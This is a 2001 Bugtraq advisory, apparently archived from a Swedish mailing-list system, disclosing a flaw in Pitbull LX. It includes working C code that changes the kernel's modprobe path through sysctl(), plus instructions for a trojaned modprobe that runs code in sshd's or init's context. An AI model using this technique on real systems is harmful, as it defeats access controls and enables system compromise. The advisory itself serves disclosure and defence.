6291323 2001-03-30 10:01 +0100 /127 rader/ Roland Postle <mail@BLAZDE.CO.UK> Sänt av: joel@lysator.liu.se Importerad: 2001-03-30 17:36 av Brevbäraren Extern mottagare: BUGTRAQ@SECURITYFOCUS.COM Externa svar till: mail@BLAZDE.CO.UK Mottagare: Bugtraq (import) <16248> Ärende: Serious Pitbull LX Vulnerability ------------------------------------------------------------ From: Roland Postle <mail@BLAZDE.CO.UK> To: BUGTRAQ@SECURITYFOCUS.COM Message-ID: <004e01c0b8f8$177b2340$0100a8c0@beast> Background: Back in February, eWeek and Argus Systems held OpenHack III. "Pitbull vs The Worlds Toughest". With much hype the contest came and went. The result? "17 days, 40,000 Challengers, 5.4 Million Punches and 1 E-Security Champion". As 'the first product to withstand an OpenHack unscathed' Pitbull LX received an eWeek Excellence Award in a security category. See www.eweek.com for a full report of the competition and award. This month, for CeBit, the very same systems were put back online and for one week the contest resumed (with prize money converted into DM). "A Rematch". The result? The word I have is that there will be no official press release. The website has even dissapeared. Well... Argus Systems are happy with the coverage they recieved from OpenHack III. And so they should be, Pitbull is a _very_ secure product. In my opinion, one of the very best security solutions. It's used by many online banks. But not many product are 100% secure.... While the systems were still online, just hours after the end of the contest, a vulnerability was exploited on the "DNS machine" running Pitbull LX. Security was completely compromised, and a similar attack would have been capable of claiming prize money at either OpenHack III or CeBit. Info: Vulnerable: PitBull LX (Pitbull For Linux), All versions Not Vulnerable: PitBull Foundation .compack (Pitbull for Solaris and AIX), All versions Type: Non-Instantaneous Complete System Compromise Local: Yes (Must be root) Remote: No Vulnerability: The vulnerability stems from Pitbull LX's failure to apply it's enhanced security features to all the kernel variables made available in /proc/sys/. Although the file-system will restrict access to the /proc/sys/ directory, all these variables can be accessed through calls to sysctl() which only checks a processes standard unix credentials. Almost all the variables are mode 644 or 444. So any user can read the kernel variables and a root user can modify many of them. A process with uid 0, can thus bypass Pitbull and modify some very sensitive kernel data. (If that last statement makes your wonder what the problem is remember that "root means nothing on a Pitbull system".) Exploit: By modifying kernel variables such as MaxFiles, MaxInodes and numerous virtual memory settings system instability can be caused but much more worringly ModProbePath can be altered to point to malicous code. When modprobe is next execd in order to load a module, the malicous code will be executed in the security context of the process which requested the module. This may be another user, init or sshd for example. Init and sshd run without the ASG_AWARE flag, so they are immune to all pitbull security. Fortunately all kernel variables are reset at startup which is when the majority of modules are loaded by init (ie. Before a user has chance to modify modprobepath). However sshd will often attempt to load terminal emulation/character set modules everytime a user connects to it. The following program will modify modprobe's path: #include <linux/unistd.h> #include <linux/types.h> #include <linux/sysctl.h> _syscall1(int, _sysctl, struct __sysctl_args *, args); int sysctl(int *name, int nlen, void *oldval, size_t *oldlenp, void *newval, size_t newlen) { struct __sysctl_args args = {name, nlen, oldval, oldlenp, newval, newlen}; return _sysctl(&args); } int variablename[] = { CTL_KERN, KERN_MODPROBE }; char oldpath[512]; int oldpathlen = 512; char path[512]; int pathlen = 512; int main(int argc, char *argv[]) { if(argc < 2) { printf("Usage: %s NewModprobePath", argv[0]); exit(0); } // Read kernel variable sysctl(variablename, 2, oldpath, &oldpathlen, NULL, 0); // Write kernel variable sysctl(variablename, 2, path, &pathlen, argv[1], strlen(argv[1])); printf("Old Path: %s, New Path %s\n", oldpath, argv[1]); return 0; } N.B. The trojaned modprobe should call the real modprobe (usually in /sbin/modprobe) with identical arguments except that argv[0] _must_ be "modprobe" (or possibly "insmod") or else modprobe claims it is being impersonated. This will ensure the relevant module still get's loaded. Fixes: An unoffical patch has been released which adds protection to a small number of the (readonly) variables. Get it from support on www.argusrevolution.com. Argus Systems have been notified of the bug and, although they were fairly unresponsive, they did at least want to know what the bug was. Keep tabs on www.argusrevolution.com for a full fix. In the mean time, the exploit discussed above can be avoided by recompiling the kernel without support for modules (drastic I know). -= Blazde =- [Unofficial Defeator of Pitbull (Yeah I'm real bitter about not gettin any prize money... but that's another story)] (6291323) /Roland Postle <mail@BLAZDE.CO.UK>/(Ombruten) Kommentar i text 6291486 av Mathias Hansson (predition's pemmican pouch)